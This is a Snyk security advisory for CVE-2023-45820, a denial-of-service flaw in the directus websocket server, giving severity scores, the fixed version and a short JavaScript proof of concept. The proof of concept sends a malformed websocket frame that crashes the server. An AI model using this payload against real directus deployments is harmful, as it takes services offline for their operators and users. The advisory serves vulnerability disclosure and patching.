Homepage
About Snyk

Improper Handling of Exceptional Conditions Affecting directus package, versions >=10.4.1 <10.6.2

Severity

 Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.04% (14th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-DIRECTUS-6016493
  • published 20 Oct 2023
  • disclosed 19 Oct 2023
  • credit Nikke Leskelä
Report a new vulnerability Found a mistake?

Introduced: 19 Oct 2023

CVE-2023-45820 Open this link in a new tab
CWE-755 Open this link in a new tab

How to fix?

Upgrade directus to version 10.6.2 or higher.

Overview

directus is a Directus is a real-time API and App dashboard for managing SQL database content.

Affected versions of this package are vulnerable to Improper Handling of Exceptional Conditions via the websocket server. An attacker can cause the server to crash and require a manual restart by sending an invalid frame. This is only exploitable if websockets are enabled.

PoC 

const WebSocket = require("ws");
const websocket = new WebSocket("ws://0.0.0.0:8055/websocket");
websocket.on("open", function () {
  const chunk = Buffer.from("a180", "hex");
  websocket._socket.write(chunk);
});

CVSS Scores

version 3.1
Expand this section

Snyk

7.5 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    None
  • Integrity (I)
    None
  • Availability (A)
    High
Expand this section

NVD

6.5 medium